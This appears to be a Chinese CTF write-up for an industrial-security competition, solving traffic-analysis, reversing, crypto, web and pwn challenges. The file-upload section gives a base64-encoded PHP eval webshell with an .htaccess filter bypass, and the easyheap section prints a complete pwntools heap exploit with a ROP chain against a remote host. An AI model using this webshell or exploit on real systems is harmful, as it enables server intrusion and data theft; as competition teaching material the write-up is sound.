00000000003901100001001932005400680065004d006f006400620075007300500072006f0074006f0063006f006c0049007300460075006e006e00790021

img

flag{TheModbusProtocolIsFunny!}

HNGK-blik

过滤了一部分字符,直接用反引号来绕过,ls直接出了

img

flag{1ggtfjar81go4u028b4a42mjn646p8v1}

HNGK-奇怪的工控协议

追踪TCP,流为1,直接查flag

img

找到flag

flag{sort__104}

HNGK-onepiece

这题是一个文件上传的功能,先尝试上传.php文件,发现进行了过滤

所以尝试上传.htaccess文件,但是服务器对文件内容也有校验,经过测试发现过滤了php的标签<?

将一句话木马进行编码的方式进行绕过:

PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+

然后在.htaccess中利用伪协议对a.gif进行解码

所以首先上传.htaccess文件

内容为


然后再上传对应的a.gif
PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+

 
上传成功getshell
看一下路径,已经被解析,说明木马已经写入进去了
直接蚁剑连接一下

上传马之后蚁剑连接,找到提示

img

解码得到

img

直接hackbar命令执行phpinfo得到flag

img

flag{1ggtei0gi3pn0k028b4a42mjn246p8ut}

HNGK-guess

拖ida看主函数分析逻辑发现是特殊的base64加密

img

img

这个就是加密之后的flag:Bw0CCDwKByAa8RYgCBYGFBQgAg8FIBUTGj4=

逆向一下逻辑即可得到flag

img

flag{if_y0u_guess_and_try}

HNGK-HardRSA

分析附件,e有五个问号,所以应该是有五位数,需要爆破,又已知n,d

import random  
def gcd(a, b):  
   if a < b:  
     a, b = b, a  
   while b != 0:  
     temp = a % b  
     a = b  
     b = temp  
   return a  
def getpq(n,e,d):
    p = 1  
    q = 1  
    for i in range(1,101):
        k = d * e - 1  
        g = random.randint ( 0 , n )  
        while p==1 and q==1 and k % 2 == 0:  
            k //= 2
            y = pow(g,k,n)  
            if y!=1 and gcd(y-1,n)>1:  
                p = gcd(y-1,n)  
                q = n//p
    return p,q  

n = 75314708877985876609891002668743876625554190294166511210009550179954413879734907287395890885734882006305000064658341495591490553852990740634932819033664336759786999376788951906380623027099236652601832025317652283419527455478573200079725665895206177368408570970326643545210806238705537263439737999272322484393
d = 10304874744787654147496365278986478201114950968434882459767596171356827577657686449351556699845391000049127292331775147314862622929371560548378501236023888087293532591829210438002936193106686968965664061672386720994287123226920682554316401724229936815553418464587344630901327534059887918508779592213104601681
for e in range(10000,99999):
    #print(e)
    p,q=getpq(n,e,d)
    if p*q==n:
        print("p=",p)
        print("q=",q)
        print('e=',e)
        break

img

解的e是13521.同时成功分解p,q

p=8134764250316914977240939055123307507750874306113160101218096577677584025654326282630936230074917597921184142227850055873398652706587349895667411302286629

q=9258376341398185999350718486678388748086924961707902231684477676159974982924771328403762590710189676719483651720152226906035715671461950810512232162187317

img

pq之和md5加密就是flag内容

img

flag{77d93d7406e76acbd8fc571296beba37}

HNGK-cool

通过pyinstxtractor反译exe

img

用pycdc再反编译cool.pyc

img

得到逻辑非常简单

s=open(‘cipher.txt’;,’rb’).read()
s=[ord(c) for c in s]
s=[31, 48, 122, 126, 85, 20, 88, 89, 68, 125, 122, 97, 68, 53, 101, 126, 77, 82, 122, 101, 115, 71, 17, 90, 74, 45, 79, 105]

flag=[]

for i in range(len(s)):
 ...:   if i%2==0:
 ...:     s[i] = s[i]^34
 ...:     continue
 ...:   if i%3==0:
 ...:     s[i] = s[i]^51
 ...:     continue
 ...:   if i%5==0:
 ...:     s[i] = s[i]^85

s=’’.join(map(chr,s))
s = s[::-1]
s.decode(‘base64’)
‘flag{Pyth0n_is_c001}’

HNGK-MMS

这个MMS流量分析也是原题

(72条消息) 2020年江西工业互联网安全技术技能大赛WP_lcafe8的博客-CSDN博客_iec60870_asdu

首先流量分析,tcp流追踪

img

找到异常流量包

3189流量包:LLN666i5250356j4249

3196流量包:LLN616732557968356j

4678流量包:LLAy7sxCA9wSYrVLCbr

猜测这三个流量包的前三位为固定格式,观察发现666i5250356j4249,616732557968356j。类似于hex编码,但是i,j在16进制不存在,所以进行替换爆破

import binascii

 

s1 = '666i5250356j4249'

s2 = '616732557968356j'

 

s = ['a','b','c','d','e','f']

 

for i in range(len(s)-1):

  tmp2 = s1.replace('i',s[i])

  tmp2 = tmp2.replace('j',s[i+1])

  print (tmp2.decode('hex'))

  tmp1 = s2.replace('j',s[i+1])

  print (tmp1.decode('hex'))

  print("---------next------------")

img

可以看到第三组是flag形式,两字母一组,上下拼接之后再左右拼接

flag{RP2U5myhBI5m}

HNGK-funning

010打开找到AddressOfNewExeHeader

AddressOfNewExeHeader改0x80

img

FUX0改UPX0

然后upx -d 脱壳

分析主体逻辑,脚本如下

from claripy import *

from Crypto.Cipher import ARC4

 

Str = [BVS('', 8) for i in range(27)]

orig = Str[:]

for i in range(0, 26, 3):

  Str[i] ^= Str[i + 1]

  Str[i] ^= Str[i + 2]

 

v4 = [0]*27

v4[0] = 47

v4[1] = 19

v4[2] = 10

v4[3] = -125

v4[4] = 59

v4[5] = 3

v4[6] = -4

v4[7] = 21

v4[8] = -22

v4[9] = 21

v4[10] = -39

v4[11] = 71

v4[12] = 72

v4[13] = -91

v4[14] = -70

v4[15] = -117

v4[16] = 76

v4[17] = -117

v4[18] = -34

v4[19] = -1

v4[20] = -2

v4[21] = 34

v4[22] = -112

v4[23] = 4

v4[24] = -99

v4[25] = 6

v4[26] = 0x34

 

for i in range(len(v4)):

  v4[i] &= 0xFF

 

solver = Solver()

 

for i in range(27):

  solver.add(v4[i] == Str[i])

 

data = b''

for i in solver.batch_eval(orig, 2):

  data = bytes(i)

  print(data.hex())

 

cipher = ARC4.new(b"don'ttrustanyone")

a = cipher.decrypt(data)

print(a)

img

flag{the_rc4_is_funning!!!}

HNGK-加密文件分析

img

第二个压缩包解压发现需要密码

img

使用掩码爆破压缩包密码,得到密码是10101739

img

发现是PCZ文件,使用力控恢复之后加载开发

img

在左边的窗口栏找的一个异常信息

img

套上flag{}得到flag

flag{fjsdkalg}

HNGK-modbus

首先过滤一下modbus协议包,观察一下modbus.func_code == 1,对数据帧长度进行排序,找到了两个目的地址明显与其他流量包不同的异常流量包,

img

查看这两个流量包序列号分别为1643,5486,然后分别减1之后就是相对应的异常流量包编号,即1642,5485
所以flag为
flag{1642+5485}

HNGK-easyheap

思路: UAF,但是存在沙盒保护禁用execve;故采用house of cat手法进行攻击

64位 查保护

img

脚本如下:

from pwn import *
 context(log_level='debug', os='linux', arch='amd64')
 \# r = process('./easyheap')
 r = remote('47.92.207.120', '21401')
 elf = ELF('./easyheap')
 libc = elf.libc
 free_got = elf.got['free']
 bss_heap = 0x404180
 edit_flag = 0x404090
 free_flag = 0x404098
 ret = 0x00401704


 def jc(i, payload):
   r.sendlineafter("Please input your choice: \n", str(2))
   r.sendlineafter("Please input your index: ", str(i))
   r.sendafter("Please input your content: ", payload)


 def cat(s, payload=b'\x00'):
   r.sendlineafter("Please input your choice: \n", str(1))
   r.sendlineafter("Please input chunk size: ", str(s))
   r.sendafter("Please input your content: ", payload)


 def et(i, payload): # 2
   r.sendlineafter("Please input your choice: \n", str(2))
   r.sendlineafter("Please input your index: ", str(i))
   r.sendafter("Please input your content: ", payload)


 def delete(i): # 7
   r.sendlineafter("Please input your choice: \n", str(3))
   r.sendlineafter("Please input your index: ", str(i))


 def get(i):
   r.sendlineafter("Please input your choice: \n", str(4))
   r.sendlineafter("Please input your index: ", str(i))
   r.recvuntil("Your content is: ")
   t_addr = int(r.recvuntil('\n')[:-1], 16)
   return t_addr;


 def decode(num):
   n1 = num & 0xffff # 低位
   n2 = (num & 0xffff0000) >> 16
   n3 = (num & 0xffff00000000) >> 32
   n4 = (num & 0xffff000000000000) >> 48 # 高位
   if n1 == 0x44:
     n1 = 0;
   else:
     n1 = n1 ^ 0x44
   if n1 == 0:
     n2 = n2 ^ 0x33
   else:
     n2 = n2 ^ n1 ^ 0x33
   if n2 == 0:
     n3 = n3 ^ 0x22
   else:
     n3 = n3 ^ n2 ^ 0x22
   if n3 == 0:
     n4 = n4 ^ 0x11
   else:
     n4 = n4 ^ n3 ^ 0x11
   t_num = (n1 * 0x1000000000000) + (n2 * 0x100000000) + (n3 * 0x10000) + n4
   return t_num


 ex = lambda: r.sendlineafter("Please input your choice: \n", str(5))

 one = [0xe3afe, 0xe3b01, 0xe3b04]
 cat(0x18)
 cat(0x18)
 cat(0x18)
 cat(0x18, b'flag\x00\x00\x00x\x00') # 3
 delete(0)
 delete(1)
 et(1, p64(bss_heap))
 cat(0x18) # 4
 cat(0x18, p64(free_got) + p64(edit_flag - 0x8) + p64(free_got - 0x8)) # 5
 et(1, p64(0xffff) * 3)
 free_addr = decode(get(0))
 libc_base = free_addr - libc.sym['free']
 system = libc_base + libc.sym['system']
 puts = libc_base + libc.sym['puts']

 io_list_all = libc_base + libc.sym['_IO_list_all']
 pointer = libc_base + 0x1F3570
 setcontext = libc_base + libc.sym['setcontext']

 pop_rdi_ret = libc_base + 0x0000000000023b6a
 pop_rsi_ret = libc_base + 0x000000000002601f
 pop_rdx_ret = libc_base + 0x0000000000142c92
 o = libc_base + libc.sym['open']
 rr = libc_base + libc.sym['read']
 w = libc_base + libc.sym['write']

 _IO_wfile_jumps = libc_base + libc.sym._IO_wfile_jumps
 _IO_2_1_stderr_ = libc_base + libc.sym._IO_2_1_stderr_
 stderr = 0x4040e0
 et(5, p64(stderr) + p64(pointer) + p64(bss_heap + 0x18))
 heap_base = decode(get(2)) - 0x300
 et(0, p64(heap_base + 0x310))
 pointer_context = decode(get(1)) # 泄露heap
 heapaddr = heap_base
 next_chain = 0
 fake_IO_FILE = p64(0) * 4 + p64(0) + p64(0) + p64(1) + p64(0)
 fake_IO_FILE += p64(heapaddr + 0x3c0)
 fake_IO_FILE += p64(setcontext + 61)
 fake_IO_FILE = fake_IO_FILE.ljust(0x58, b'\x00')
 fake_IO_FILE += p64(0)
 fake_IO_FILE = fake_IO_FILE.ljust(0x78, b'\x00')
 fake_IO_FILE += p64(heapaddr + 0x1000)
 fake_IO_FILE = fake_IO_FILE.ljust(0x90, b'\x00')
 fake_IO_FILE += p64(heapaddr + 0x340) # rax1
 fake_IO_FILE = fake_IO_FILE.ljust(0xB0, b'\x00')
 fake_IO_FILE += p64(1)
 fake_IO_FILE = fake_IO_FILE.ljust(0xC8, b'\x00')
 fake_IO_FILE += p64(_IO_wfile_jumps + 0x10)
 fake_IO_FILE += p64(0) * 6
 fake_IO_FILE += p64(heapaddr + 0x340 + 0x10)
 \# gdb.attach(r)
 \# pause()
 flag_addr = heapaddr + 0x300
 payload1 = fake_IO_FILE + p64(flag_addr) + p64(0) + p64(0) * 5 + p64(heapaddr + 0x530) + p64(ret)
 payload2 = p64(pop_rdi_ret) + p64(flag_addr) + p64(pop_rsi_ret) + p64(0) + p64(o)
 payload2 += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(bss_heap + 0x200) + p64(pop_rdx_ret) + p64(0x100) + p64(
   rr)
 payload2 += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(bss_heap + 0x200) + p64(pop_rdx_ret) + p64(0x100) + p64(
   w) # 0x98

 cat(0x200, payload1) # 6
 cat(0x100, payload2) # 7
 et(5, p64(heap_base + 0x630) * 3)
 et(0, p64(0) + p64(0x13))
 success("system -> " + hex(system))
 success("free_addr -> " + hex(free_addr))
 success("heap_base -> " + hex(heap_base))
 success("pointer_context -> " + hex(pointer_context))
 \# gdb.attach(r)
 \# pause()
 r.sendlineafter("Please input your choice: \n", str(1))
 r.sendlineafter("Please input chunk size: ", str(0x50))
 r.interactive()

img

flag{1ggtu0fvh15qrk028b4a42mjno46p8vj}

制作不易,如若感觉写的不错,欢迎打赏